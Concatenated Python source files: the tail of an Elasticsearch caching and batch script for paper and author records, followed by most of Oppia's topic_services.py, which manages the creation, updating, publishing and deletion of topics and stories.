return uuid.uuid1() if not seed else hashlib.sha1(str.encode(seed)).hexdigest()
def init_es():
connections.create_connection(hosts = hostname, timeout=20)
print("Elasticsearch connections initialized")
def saveNewAuthorGroupCache(cache):
print("starting cache")
init_es()
assert cache["Type"] in cache_types["author_group"]
doc = AuthorGroup()
doc.Type = cache["Type"]
doc.NormalizedNames = cache["NormalizedNames"]
doc.DisplayName = cache["DisplayName"]
doc.Year = cache["Year"] if ("Year" in cache and cache['Year'].isdigit()) else None
doc.Affiliations = cache["Affiliations"] if "Affiliations" in cache else None
doc.Keywords = cache["Keywords"] if "Keywords" in cache else None
doc.Url = cache['Url'] if 'Url' in cache else None
doc.Citation = cache['Citation']
doc.AuthorIds = cache['AuthorIds'] if 'AuthorIds' in cache else None
doc.CreatedDate = datetime.now()
doc.meta.id = generate_uuid("{}-{}".format(doc.Type, doc.DisplayName))
doc.meta.index = "browse_author_group"
doc.save()
print("finished caching")
def saveNewPaperGroupCache(cache):
print("starting cache")
init_es()
assert cache["Type"] in cache_types["paper_group"]
doc = PaperGroup()
doc.Type = cache["Type"]
doc.NormalizedName = cache["NormalizedName"]
doc.DisplayName = cache["DisplayName"]
doc.PaperIds = cache["PaperIds"]
doc.Year = cache["Year"] if ("Year" in cache and cache['Year'].isdigit()) else None
doc.Field = cache["Field"] if "Field" in cache else None
doc.Keywords = cache["Keywords"] if "Keywords" in cache else None
doc.CreatedDate = datetime.now()
doc.meta.id = generate_uuid("{}-{}={}".format(doc.Year, doc.Field, doc.NormalizedName))
doc.meta.index = "browse_paper_group"
doc.save()
def saveNewBrowseCache(cache):
print("starting cache")
init_es()
# validation
assert "DisplayName" in cache
assert "EntityIds" in cache
assert "Type" in cache
doc = BrowseCache()
# required fields
doc.Type = cache["Type"]
doc.DisplayName = cache["DisplayName"]
doc.EntityIds = {}
for key in cache["EntityIds"]:
doc.EntityIds[key] = cache["EntityIds"][key]
# optional fields
if "Citation" in cache: doc.Citation = cache["Citation"]
if "Year" in cache and str(cache["Year"]).isdigit() : doc.Year = cache["Year"]
if "Field" in cache: doc.Field = cache["Field"]
if "Affiliations" in cache: doc.Affiliations = cache["Affiliations"]
if "Url" in cache: doc.Url = cache["Url"]
if "PhotoUrl" in cache: doc.PhotoUrl = cache["PhotoUrl"]
for key,value in cache.items():
if key not in ["Type","DisplayName","EntityIds","Citation","Year","Field","Affiliations","Url","PhotoUrl"]: doc[key] = value
# meta data
doc.CreatedDate = datetime.now()
doc.meta.id = generate_uuid("{}-{}".format(doc.DisplayName, doc.Type))
doc.meta.index = "browse_cache"
print(doc.to_dict())
doc.save()
# return generated id for document
return doc.meta.id
import json
from core.search.query_info import paper_info_mag_check_multiquery
batchPath = "/home/u5798145/papers_to_cache"
def addToBatch(new_papers):
with open(batchPath, 'r') as fh:
papers = json.loads(fh.read())
papers += new_papers
papers = list(set(papers))
with open(batchPath, 'w') as fh:
json.dump(papers,fh)
def getBatch():
with open(batchPath, 'r') as fh:
papers = json.loads(fh.read())
return papers
def emptyBatch():
with open(batchPath, 'w') as fh:
json.dump([],fh)
def cacheBatch():
batchsize = 150
while sizeBatch() > 0:
batch = getBatch()
batchindex = min([batchsize, len(batch)])
minibatch = batch[0:batchindex]
rebatch = batch[batchindex:len(batch)]
print("caching {} papers".format(len(minibatch)))
paper_info_mag_check_multiquery(minibatch)
print("{} papers remaining in batch".format(len(rebatch)))
emptyBatch()
addToBatch(rebatch)
def sizeBatch():
with open(batchPath, 'r') as fh:
papers = json.loads(fh.read())
return len(papers)
def main():
if len(sys.argv) > 2:
if sys.argv[1] == "batch":
if sys.argv[2] == "get":
for line in getBatch():
print(line)
elif sys.argv[2] == "empty":
emptyBatch()
elif sys.argv[2] == "cache":
cacheBatch()
elif sys.argv[2] == "add" and len(sys.argv) > 3:
addToBatch(sys.argv[3].split(','))
elif sys.argv[2] == "size":
print(sizeBatch())
if __name__ == '__main__':
main()
| 33.062893
| 132
| 0.62393
|
cf6fc96b194152e95e1e9f9a20e403f955f872d7
| 50,272
|
py
|
Python
|
core/domain/topic_services.py
|
prayutsu/oppia
|
e82da7653f7bbfb9ded0e1ba16cd9f481ff5a786
|
[
"Apache-2.0"
] | 2
|
2020-03-28T18:32:45.000Z
|
2021-02-07T18:29:31.000Z
|
core/domain/topic_services.py
|
prayutsu/oppia
|
e82da7653f7bbfb9ded0e1ba16cd9f481ff5a786
|
[
"Apache-2.0"
] | 1
|
2021-01-06T06:00:08.000Z
|
2021-01-07T02:00:21.000Z
|
core/domain/topic_services.py
|
prayutsu/oppia
|
e82da7653f7bbfb9ded0e1ba16cd9f481ff5a786
|
[
"Apache-2.0"
] | 1
|
2022-02-14T22:03:53.000Z
|
2022-02-14T22:03:53.000Z
|
# coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.]
"""Commands for operations on topics, and related models."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import collections
import logging
from core.domain import caching_services
from core.domain import feedback_services
from core.domain import opportunity_services
from core.domain import rights_domain
from core.domain import role_services
from core.domain import state_domain
from core.domain import story_fetchers
from core.domain import story_services
from core.domain import subtopic_page_domain
from core.domain import subtopic_page_services
from core.domain import suggestion_services
from core.domain import topic_domain
from core.domain import topic_fetchers
from core.domain import user_services
from core.platform import models
import feconf
import python_utils
import utils
(topic_models,) = models.Registry.import_models([models.NAMES.topic])
datastore_services = models.Registry.import_datastore_services()
def get_all_topic_summaries():
"""Returns the summaries of all topics present in the datastore.
Returns:
list(TopicSummary). The list of summaries of all topics present in the
datastore.
"""
topic_summaries_models = topic_models.TopicSummaryModel.get_all()
topic_summaries = [
get_topic_summary_from_model(summary)
for summary in topic_summaries_models]
return topic_summaries
def get_multi_topic_summaries(topic_ids):
"""Returns the summaries of all topics whose topic ids are passed in.
Args:
topic_ids: list(str). The IDs of topics for which summaries are to be
returned.
Returns:
list(TopicSummary). The list of summaries of all given topics present in
the datastore.
"""
topic_summaries_models = topic_models.TopicSummaryModel.get_multi(topic_ids)
topic_summaries = [
get_topic_summary_from_model(summary) if summary else None
for summary in topic_summaries_models]
return topic_summaries
def get_all_skill_ids_assigned_to_some_topic():
"""Returns the ids of all the skills that are linked to some topics.
Returns:
set([str]). The ids of all the skills linked to some topic.
"""
skill_ids = set([])
all_topic_models = topic_models.TopicModel.get_all()
all_topics = [
topic_fetchers.get_topic_from_model(topic)
for topic in all_topic_models]
for topic in all_topics:
skill_ids.update(topic.get_all_skill_ids())
return skill_ids
def get_topic_summary_from_model(topic_summary_model):
"""Returns a domain object for an Oppia topic summary given a
topic summary model.
Args:
topic_summary_model: TopicSummaryModel. The topic summary model object
to get the corresponding domain object.
Returns:
TopicSummary. The domain object corresponding to the given model object.
"""
return topic_domain.TopicSummary(
topic_summary_model.id, topic_summary_model.name,
topic_summary_model.canonical_name,
topic_summary_model.language_code,
topic_summary_model.description,
topic_summary_model.version,
topic_summary_model.canonical_story_count,
topic_summary_model.additional_story_count,
topic_summary_model.uncategorized_skill_count,
topic_summary_model.subtopic_count,
topic_summary_model.total_skill_count,
topic_summary_model.thumbnail_filename,
topic_summary_model.thumbnail_bg_color,
topic_summary_model.url_fragment,
topic_summary_model.topic_model_created_on,
topic_summary_model.topic_model_last_updated
)
def get_topic_summary_by_id(topic_id, strict=True):
"""Returns a domain object representing a topic summary.
Args:
topic_id: str. ID of the topic summary.
strict: bool. Whether to fail noisily if no topic summary with the given
id exists in the datastore.
Returns:
TopicSummary or None. The topic summary domain object corresponding to
a topic with the given topic_id, if it exists, or else None.
"""
topic_summary_model = topic_models.TopicSummaryModel.get(
topic_id, strict=strict)
if topic_summary_model:
topic_summary = get_topic_summary_from_model(topic_summary_model)
return topic_summary
else:
return None
def get_new_topic_id():
"""Returns a new topic id.
Returns:
str. A new topic id.
"""
return topic_models.TopicModel.get_new_id('')
def _create_topic(committer_id, topic, commit_message, commit_cmds):
"""Creates a new topic, and ensures that rights for a new topic
are saved first.
Args:
committer_id: str. ID of the committer.
topic: Topic. Topic domain object.
commit_message: str. A description of changes made to the topic.
commit_cmds: list(TopicChange). A list of TopicChange objects that
represent change commands made to the given topic.
"""
topic.validate()
if does_topic_with_name_exist(topic.name):
raise utils.ValidationError(
'Topic with name \'%s\' already exists' % topic.name)
if does_topic_with_url_fragment_exist(topic.url_fragment):
raise utils.ValidationError(
'Topic with URL Fragment \'%s\' already exists'
% topic.url_fragment)
create_new_topic_rights(topic.id, committer_id)
model = topic_models.TopicModel(
id=topic.id,
name=topic.name,
abbreviated_name=topic.abbreviated_name,
url_fragment=topic.url_fragment,
thumbnail_bg_color=topic.thumbnail_bg_color,
thumbnail_filename=topic.thumbnail_filename,
canonical_name=topic.canonical_name,
description=topic.description,
language_code=topic.language_code,
canonical_story_references=[
reference.to_dict()
for reference in topic.canonical_story_references],
additional_story_references=[
reference.to_dict()
for reference in topic.additional_story_references],
uncategorized_skill_ids=topic.uncategorized_skill_ids,
subtopic_schema_version=topic.subtopic_schema_version,
story_reference_schema_version=topic.story_reference_schema_version,
next_subtopic_id=topic.next_subtopic_id,
subtopics=[subtopic.to_dict() for subtopic in topic.subtopics],
meta_tag_content=topic.meta_tag_content,
practice_tab_is_displayed=topic.practice_tab_is_displayed,
page_title_fragment_for_web=topic.page_title_fragment_for_web
)
commit_cmd_dicts = [commit_cmd.to_dict() for commit_cmd in commit_cmds]
model.commit(committer_id, commit_message, commit_cmd_dicts)
topic.version += 1
generate_topic_summary(topic.id)
def does_topic_with_name_exist(topic_name):
"""Checks if the topic with provided name exists.
Args:
topic_name: str. The topic name.
Returns:
bool. Whether the the topic name exists.
Raises:
Exception. Topic name is not a string.
"""
if not isinstance(topic_name, python_utils.BASESTRING):
raise utils.ValidationError('Name should be a string.')
existing_topic = topic_fetchers.get_topic_by_name(topic_name)
return existing_topic is not None
def does_topic_with_url_fragment_exist(url_fragment):
"""Checks if topic with provided url fragment exists.
Args:
url_fragment: str. The url fragment for the topic.
Returns:
bool. Whether the the url fragment for the topic exists.
Raises:
Exception. Topic URL fragment is not a string.
"""
if not isinstance(url_fragment, python_utils.BASESTRING):
raise utils.ValidationError('Topic URL fragment should be a string.')
existing_topic = (
topic_fetchers.get_topic_by_url_fragment(url_fragment))
return existing_topic is not None
def save_new_topic(committer_id, topic):
"""Saves a new topic.
Args:
committer_id: str. ID of the committer.
topic: Topic. Topic to be saved.
"""
commit_message = (
'New topic created with name \'%s\'.' % topic.name)
_create_topic(
committer_id, topic, commit_message, [topic_domain.TopicChange({
'cmd': topic_domain.CMD_CREATE_NEW,
'name': topic.name
})])
def apply_change_list(topic_id, change_list):
"""Applies a changelist to a topic and returns the result. The incoming
changelist should not have simultaneuous creations and deletion of
subtopics.
Args:
topic_id: str. ID of the given topic.
change_list: list(TopicChange). A change list to be applied to the given
topic.
Raises:
Exception. The incoming changelist had simultaneuous creation and
deletion of subtopics.
Returns:
tuple(Topic, dict, list(int), list(int), list(SubtopicPageChange)). The
modified topic object, the modified subtopic pages dict keyed
by subtopic page id containing the updated domain objects of
each subtopic page, a list of ids of the deleted subtopics,
a list of ids of the newly created subtopics and a list of changes
applied to modified subtopic pages.
"""
topic = topic_fetchers.get_topic_by_id(topic_id)
newly_created_subtopic_ids = []
existing_subtopic_page_ids_to_be_modified = []
deleted_subtopic_ids = []
modified_subtopic_pages_list = []
modified_subtopic_pages = {}
modified_subtopic_change_cmds = collections.defaultdict(list)
for change in change_list:
if (change.cmd ==
subtopic_page_domain.CMD_UPDATE_SUBTOPIC_PAGE_PROPERTY):
if change.subtopic_id < topic.next_subtopic_id:
existing_subtopic_page_ids_to_be_modified.append(
change.subtopic_id)
subtopic_page_id = (
subtopic_page_domain.SubtopicPage.get_subtopic_page_id(
topic_id, change.subtopic_id))
modified_subtopic_change_cmds[subtopic_page_id].append(
change)
modified_subtopic_pages_list = (
subtopic_page_services.get_subtopic_pages_with_ids(
topic_id, existing_subtopic_page_ids_to_be_modified))
for subtopic_page in modified_subtopic_pages_list:
modified_subtopic_pages[subtopic_page.id] = subtopic_page
try:
for change in change_list:
if change.cmd == topic_domain.CMD_ADD_SUBTOPIC:
topic.add_subtopic(change.subtopic_id, change.title)
subtopic_page_id = (
subtopic_page_domain.SubtopicPage.get_subtopic_page_id(
topic_id, change.subtopic_id))
modified_subtopic_pages[subtopic_page_id] = (
subtopic_page_domain.SubtopicPage.create_default_subtopic_page( # pylint: disable=line-too-long
change.subtopic_id, topic_id)
)
modified_subtopic_change_cmds[subtopic_page_id].append(
subtopic_page_domain.SubtopicPageChange({
'cmd': 'create_new',
'topic_id': topic_id,
'subtopic_id': change.subtopic_id
}))
newly_created_subtopic_ids.append(change.subtopic_id)
elif change.cmd == topic_domain.CMD_DELETE_SUBTOPIC:
topic.delete_subtopic(change.subtopic_id)
if change.subtopic_id in newly_created_subtopic_ids:
raise Exception(
'The incoming changelist had simultaneous'
' creation and deletion of subtopics.')
deleted_subtopic_ids.append(change.subtopic_id)
elif change.cmd == topic_domain.CMD_ADD_CANONICAL_STORY:
topic.add_canonical_story(change.story_id)
elif change.cmd == topic_domain.CMD_DELETE_CANONICAL_STORY:
topic.delete_canonical_story(change.story_id)
elif change.cmd == topic_domain.CMD_REARRANGE_CANONICAL_STORY:
topic.rearrange_canonical_story(
change.from_index, change.to_index)
elif change.cmd == topic_domain.CMD_ADD_ADDITIONAL_STORY:
topic.add_additional_story(change.story_id)
elif change.cmd == topic_domain.CMD_DELETE_ADDITIONAL_STORY:
topic.delete_additional_story(change.story_id)
elif change.cmd == topic_domain.CMD_ADD_UNCATEGORIZED_SKILL_ID:
topic.add_uncategorized_skill_id(
change.new_uncategorized_skill_id)
elif change.cmd == topic_domain.CMD_REMOVE_UNCATEGORIZED_SKILL_ID:
topic.remove_uncategorized_skill_id(
change.uncategorized_skill_id)
elif change.cmd == topic_domain.CMD_MOVE_SKILL_ID_TO_SUBTOPIC:
topic.move_skill_id_to_subtopic(
change.old_subtopic_id, change.new_subtopic_id,
change.skill_id)
elif change.cmd == topic_domain.CMD_REARRANGE_SKILL_IN_SUBTOPIC:
topic.rearrange_skill_in_subtopic(
change.subtopic_id, change.from_index, change.to_index)
elif change.cmd == topic_domain.CMD_REARRANGE_SUBTOPIC:
topic.rearrange_subtopic(change.from_index, change.to_index)
elif change.cmd == topic_domain.CMD_REMOVE_SKILL_ID_FROM_SUBTOPIC:
topic.remove_skill_id_from_subtopic(
change.subtopic_id, change.skill_id)
elif change.cmd == topic_domain.CMD_UPDATE_TOPIC_PROPERTY:
if (change.property_name ==
topic_domain.TOPIC_PROPERTY_NAME):
topic.update_name(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_ABBREVIATED_NAME):
topic.update_abbreviated_name(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_URL_FRAGMENT):
topic.update_url_fragment(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_DESCRIPTION):
topic.update_description(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_LANGUAGE_CODE):
topic.update_language_code(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_THUMBNAIL_FILENAME):
topic.update_thumbnail_filename(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_THUMBNAIL_BG_COLOR):
topic.update_thumbnail_bg_color(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_META_TAG_CONTENT):
topic.update_meta_tag_content(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_PRACTICE_TAB_IS_DISPLAYED):
topic.update_practice_tab_is_displayed(change.new_value)
elif (change.property_name ==
topic_domain.TOPIC_PROPERTY_PAGE_TITLE_FRAGMENT_FOR_WEB):
topic.update_page_title_fragment_for_web(change.new_value)
elif (change.cmd ==
subtopic_page_domain.CMD_UPDATE_SUBTOPIC_PAGE_PROPERTY):
subtopic_page_id = (
subtopic_page_domain.SubtopicPage.get_subtopic_page_id(
topic_id, change.subtopic_id))
if ((modified_subtopic_pages[subtopic_page_id] is None) or
(change.subtopic_id in deleted_subtopic_ids)):
raise Exception(
'The subtopic with id %s doesn\'t exist' % (
change.subtopic_id))
if (change.property_name ==
subtopic_page_domain.
SUBTOPIC_PAGE_PROPERTY_PAGE_CONTENTS_HTML):
page_contents = state_domain.SubtitledHtml.from_dict(
change.new_value)
page_contents.validate()
modified_subtopic_pages[
subtopic_page_id].update_page_contents_html(
page_contents)
elif (change.property_name ==
subtopic_page_domain.
SUBTOPIC_PAGE_PROPERTY_PAGE_CONTENTS_AUDIO):
modified_subtopic_pages[
subtopic_page_id].update_page_contents_audio(
state_domain.RecordedVoiceovers.from_dict(
change.new_value))
elif change.cmd == topic_domain.CMD_UPDATE_SUBTOPIC_PROPERTY:
if (change.property_name ==
topic_domain.SUBTOPIC_PROPERTY_TITLE):
topic.update_subtopic_title(
change.subtopic_id, change.new_value)
if (change.property_name ==
topic_domain.SUBTOPIC_PROPERTY_THUMBNAIL_FILENAME):
topic.update_subtopic_thumbnail_filename(
change.subtopic_id, change.new_value)
if (change.property_name ==
topic_domain.SUBTOPIC_PROPERTY_THUMBNAIL_BG_COLOR):
topic.update_subtopic_thumbnail_bg_color(
change.subtopic_id, change.new_value)
if (change.property_name ==
topic_domain.SUBTOPIC_PROPERTY_URL_FRAGMENT):
topic.update_subtopic_url_fragment(
change.subtopic_id, change.new_value)
elif (
change.cmd ==
topic_domain.CMD_MIGRATE_SUBTOPIC_SCHEMA_TO_LATEST_VERSION):
# Loading the topic model from the datastore into a
# Topic domain object automatically converts it to use the
# latest schema version. As a result, simply resaving the
# topic is sufficient to apply the schema migration.
continue
return (
topic, modified_subtopic_pages, deleted_subtopic_ids,
newly_created_subtopic_ids, modified_subtopic_change_cmds)
except Exception as e:
logging.error(
'%s %s %s %s' % (
e.__class__.__name__, e, topic_id, change_list)
)
python_utils.reraise_exception()
def _save_topic(committer_id, topic, commit_message, change_list):
"""Validates a topic and commits it to persistent storage. If
successful, increments the version number of the incoming topic domain
object by 1.
Args:
committer_id: str. ID of the given committer.
topic: Topic. The topic domain object to be saved.
commit_message: str. The commit message.
change_list: list(TopicChange). List of changes applied to a topic.
Raises:
Exception. Received invalid change list.
Exception. The topic model and the incoming topic domain
object have different version numbers.
"""
if not change_list:
raise Exception(
'Unexpected error: received an invalid change list when trying to '
'save topic %s: %s' % (topic.id, change_list))
topic_rights = topic_fetchers.get_topic_rights(topic.id, strict=False)
topic.validate(strict=topic_rights.topic_is_published)
topic_model = topic_models.TopicModel.get(topic.id, strict=False)
# Topic model cannot be None as topic is passed as parameter here and that
# is only possible if a topic model with that topic id exists. Also this is
# a private function and so it cannot be called independently with any
# topic object.
if topic.version > topic_model.version:
raise Exception(
'Unexpected error: trying to update version %s of topic '
'from version %s. Please reload the page and try again.'
% (topic_model.version, topic.version))
elif topic.version < topic_model.version:
raise Exception(
'Trying to update version %s of topic from version %s, '
'which is too old. Please reload the page and try again.'
% (topic_model.version, topic.version))
topic_model.description = topic.description
topic_model.name = topic.name
topic_model.canonical_name = topic.canonical_name
topic_model.abbreviated_name = topic.abbreviated_name
topic_model.url_fragment = topic.url_fragment
topic_model.thumbnail_bg_color = topic.thumbnail_bg_color
topic_model.thumbnail_filename = topic.thumbnail_filename
topic_model.canonical_story_references = [
reference.to_dict() for reference in topic.canonical_story_references
]
topic_model.additional_story_references = [
reference.to_dict() for reference in topic.additional_story_references
]
topic_model.uncategorized_skill_ids = topic.uncategorized_skill_ids
topic_model.subtopics = [subtopic.to_dict() for subtopic in topic.subtopics]
topic_model.subtopic_schema_version = topic.subtopic_schema_version
topic_model.story_reference_schema_version = (
topic.story_reference_schema_version)
topic_model.next_subtopic_id = topic.next_subtopic_id
topic_model.language_code = topic.language_code
topic_model.meta_tag_content = topic.meta_tag_content
topic_model.practice_tab_is_displayed = topic.practice_tab_is_displayed
topic_model.page_title_fragment_for_web = topic.page_title_fragment_for_web
change_dicts = [change.to_dict() for change in change_list]
topic_model.commit(committer_id, commit_message, change_dicts)
caching_services.delete_multi(
caching_services.CACHE_NAMESPACE_TOPIC, None, [topic.id])
topic.version += 1
def update_topic_and_subtopic_pages(
committer_id, topic_id, change_list, commit_message):
"""Updates a topic and its subtopic pages. Commits changes.
Args:
committer_id: str. The id of the user who is performing the update
action.
topic_id: str. The topic id.
change_list: list(TopicChange and SubtopicPageChange). These changes are
applied in sequence to produce the resulting topic.
commit_message: str or None. A description of changes made to the
topic.
Raises:
ValueError. Current user does not have enough rights to edit a topic.
"""
if not commit_message:
raise ValueError(
'Expected a commit message, received none.')
old_topic = topic_fetchers.get_topic_by_id(topic_id)
(
updated_topic, updated_subtopic_pages_dict,
deleted_subtopic_ids, newly_created_subtopic_ids,
updated_subtopic_pages_change_cmds_dict
) = apply_change_list(topic_id, change_list)
if (
old_topic.url_fragment != updated_topic.url_fragment and
does_topic_with_url_fragment_exist(updated_topic.url_fragment)):
raise utils.ValidationError(
'Topic with URL Fragment \'%s\' already exists'
% updated_topic.url_fragment)
if (
old_topic.name != updated_topic.name and
does_topic_with_name_exist(updated_topic.name)):
raise utils.ValidationError(
'Topic with name \'%s\' already exists' % updated_topic.name)
_save_topic(
committer_id, updated_topic, commit_message, change_list
)
# The following loop deletes those subtopic pages that are already in the
# datastore, which are supposed to be deleted in the current changelist.
for subtopic_id in deleted_subtopic_ids:
if subtopic_id not in newly_created_subtopic_ids:
subtopic_page_services.delete_subtopic_page(
committer_id, topic_id, subtopic_id)
for subtopic_page_id in updated_subtopic_pages_dict:
subtopic_page = updated_subtopic_pages_dict[subtopic_page_id]
subtopic_page_change_list = updated_subtopic_pages_change_cmds_dict[
subtopic_page_id]
subtopic_id = subtopic_page.get_subtopic_id_from_subtopic_page_id()
# The following condition prevents the creation of subtopic pages that
# were deleted above.
if subtopic_id not in deleted_subtopic_ids:
subtopic_page_services.save_subtopic_page(
committer_id, subtopic_page, commit_message,
subtopic_page_change_list)
generate_topic_summary(topic_id)
if old_topic.name != updated_topic.name:
opportunity_services.update_opportunities_with_new_topic_name(
updated_topic.id, updated_topic.name)
def delete_uncategorized_skill(user_id, topic_id, uncategorized_skill_id):
"""Removes skill with given id from the topic.
Args:
user_id: str. The id of the user who is performing the action.
topic_id: str. The id of the topic from which to remove the skill.
uncategorized_skill_id: str. The uncategorized skill to remove from the
topic.
"""
change_list = [topic_domain.TopicChange({
'cmd': 'remove_uncategorized_skill_id',
'uncategorized_skill_id': uncategorized_skill_id
})]
update_topic_and_subtopic_pages(
user_id, topic_id, change_list,
'Removed %s from uncategorized skill ids' % uncategorized_skill_id)
def add_uncategorized_skill(user_id, topic_id, uncategorized_skill_id):
"""Adds a skill with given id to the topic.
Args:
user_id: str. The id of the user who is performing the action.
topic_id: str. The id of the topic to which the skill is to be added.
uncategorized_skill_id: str. The id of the uncategorized skill to add
to the topic.
"""
change_list = [topic_domain.TopicChange({
'cmd': 'add_uncategorized_skill_id',
'new_uncategorized_skill_id': uncategorized_skill_id
})]
update_topic_and_subtopic_pages(
user_id, topic_id, change_list,
'Added %s to uncategorized skill ids' % uncategorized_skill_id)
def publish_story(topic_id, story_id, committer_id):
"""Marks the given story as published.
Args:
topic_id: str. The id of the topic.
story_id: str. The id of the given story.
committer_id: str. ID of the committer.
Raises:
Exception. The given story does not exist.
Exception. The story is already published.
Exception. The user does not have enough rights to publish the story.
"""
def _are_nodes_valid_for_publishing(story_nodes):
"""Validates the story nodes before publishing.
Args:
story_nodes: list(dict(str, *)). The list of story nodes dicts.
Raises:
Exception. The story node doesn't contain any exploration id or the
exploration id is invalid or isn't published yet.
"""
exploration_id_list = []
for node in story_nodes:
if not node.exploration_id:
raise Exception(
'Story node with id %s does not contain an '
'exploration id.' % node.id)
exploration_id_list.append(node.exploration_id)
story_services.validate_explorations_for_story(
exploration_id_list, True)
topic = topic_fetchers.get_topic_by_id(topic_id, strict=None)
if topic is None:
raise Exception('A topic with the given ID doesn\'t exist')
user = user_services.UserActionsInfo(committer_id)
if role_services.ACTION_CHANGE_STORY_STATUS not in user.actions:
raise Exception(
'The user does not have enough rights to publish the story.')
story = story_fetchers.get_story_by_id(story_id, strict=False)
if story is None:
raise Exception('A story with the given ID doesn\'t exist')
for node in story.story_contents.nodes:
if node.id == story.story_contents.initial_node_id:
_are_nodes_valid_for_publishing([node])
topic.publish_story(story_id)
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_PUBLISH_STORY,
'story_id': story_id
})]
_save_topic(
committer_id, topic, 'Published story with id %s' % story_id,
change_list)
generate_topic_summary(topic.id)
opportunity_services.create_exploration_opportunities_for_story(
story_id, topic_id)
def unpublish_story(topic_id, story_id, committer_id):
"""Marks the given story as unpublished.
Args:
topic_id: str. The id of the topic.
story_id: str. The id of the given story.
committer_id: str. ID of the committer.
Raises:
Exception. The given story does not exist.
Exception. The story is already unpublished.
Exception. The user does not have enough rights to unpublish the story.
"""
user = user_services.UserActionsInfo(committer_id)
if role_services.ACTION_CHANGE_STORY_STATUS not in user.actions:
raise Exception(
'The user does not have enough rights to unpublish the story.')
topic = topic_fetchers.get_topic_by_id(topic_id, strict=None)
if topic is None:
raise Exception('A topic with the given ID doesn\'t exist')
story = story_fetchers.get_story_by_id(story_id, strict=False)
if story is None:
raise Exception('A story with the given ID doesn\'t exist')
topic.unpublish_story(story_id)
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_UNPUBLISH_STORY,
'story_id': story_id
})]
_save_topic(
committer_id, topic, 'Unpublished story with id %s' % story_id,
change_list)
generate_topic_summary(topic.id)
# Delete corresponding exploration opportunities and reject associated
# translation suggestions.
exp_ids = story.story_contents.get_all_linked_exp_ids()
opportunity_services.delete_exploration_opportunities(exp_ids)
suggestion_services.auto_reject_translation_suggestions_for_exp_ids(exp_ids)
def delete_canonical_story(user_id, topic_id, story_id):
"""Removes story with given id from the topic.
NOTE TO DEVELOPERS: Presently, this function only removes story_reference
from canonical_story_references list.
Args:
user_id: str. The id of the user who is performing the action.
topic_id: str. The id of the topic from which to remove the story.
story_id: str. The story to remove from the topic.
"""
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_DELETE_CANONICAL_STORY,
'story_id': story_id
})]
update_topic_and_subtopic_pages(
user_id, topic_id, change_list,
'Removed %s from canonical story ids' % story_id)
def add_canonical_story(user_id, topic_id, story_id):
"""Adds a story to the canonical story reference list of a topic.
Args:
user_id: str. The id of the user who is performing the action.
topic_id: str. The id of the topic to which the story is to be added.
story_id: str. The story to add to the topic.
"""
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_ADD_CANONICAL_STORY,
'story_id': story_id
})]
update_topic_and_subtopic_pages(
user_id, topic_id, change_list,
'Added %s to canonical story ids' % story_id)
def delete_additional_story(user_id, topic_id, story_id):
"""Removes story with given id from the topic.
NOTE TO DEVELOPERS: Presently, this function only removes story_reference
from additional_story_references list.
Args:
user_id: str. The id of the user who is performing the action.
topic_id: str. The id of the topic from which to remove the story.
story_id: str. The story to remove from the topic.
"""
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_DELETE_ADDITIONAL_STORY,
'story_id': story_id
})]
update_topic_and_subtopic_pages(
user_id, topic_id, change_list,
'Removed %s from additional story ids' % story_id)
def add_additional_story(user_id, topic_id, story_id):
"""Adds a story to the additional story reference list of a topic.
Args:
user_id: str. The id of the user who is performing the action.
topic_id: str. The id of the topic to which the story is to be added.
story_id: str. The story to add to the topic.
"""
change_list = [topic_domain.TopicChange({
'cmd': topic_domain.CMD_ADD_ADDITIONAL_STORY,
'story_id': story_id
})]
update_topic_and_subtopic_pages(
user_id, topic_id, change_list,
'Added %s to additional story ids' % story_id)
def delete_topic(committer_id, topic_id, force_deletion=False):
"""Deletes the topic with the given topic_id.
Args:
committer_id: str. ID of the committer.
topic_id: str. ID of the topic to be deleted.
force_deletion: bool. If true, the topic and its history are fully
deleted and are unrecoverable. Otherwise, the topic and all
its history are marked as deleted, but the corresponding models are
still retained in the datastore. This last option is the preferred
one.
Raises:
ValueError. User does not have enough rights to delete a topic.
"""
topic_rights_model = topic_models.TopicRightsModel.get(topic_id)
topic_rights_model.delete(
committer_id, feconf.COMMIT_MESSAGE_TOPIC_DELETED,
force_deletion=force_deletion)
# Delete the summary of the topic (regardless of whether
# force_deletion is True or not).
delete_topic_summary(topic_id)
topic_model = topic_models.TopicModel.get(topic_id)
for subtopic in topic_model.subtopics:
subtopic_page_services.delete_subtopic_page(
committer_id, topic_id, subtopic['id'])
all_story_references = (
topic_model.canonical_story_references +
topic_model.additional_story_references)
for story_reference in all_story_references:
story_services.delete_story(
committer_id, story_reference['story_id'],
force_deletion=force_deletion)
topic_model.delete(
committer_id, feconf.COMMIT_MESSAGE_TOPIC_DELETED,
force_deletion=force_deletion)
feedback_services.delete_threads_for_multiple_entities(
feconf.ENTITY_TYPE_TOPIC, [topic_id])
# This must come after the topic is retrieved. Otherwise the memcache
# key will be reinstated.
caching_services.delete_multi(
caching_services.CACHE_NAMESPACE_TOPIC, None, [topic_id])
(
opportunity_services
.delete_exploration_opportunities_corresponding_to_topic(topic_id))
def delete_topic_summary(topic_id):
"""Delete a topic summary model.
Args:
topic_id: str. ID of the topic whose topic summary is to
be deleted.
"""
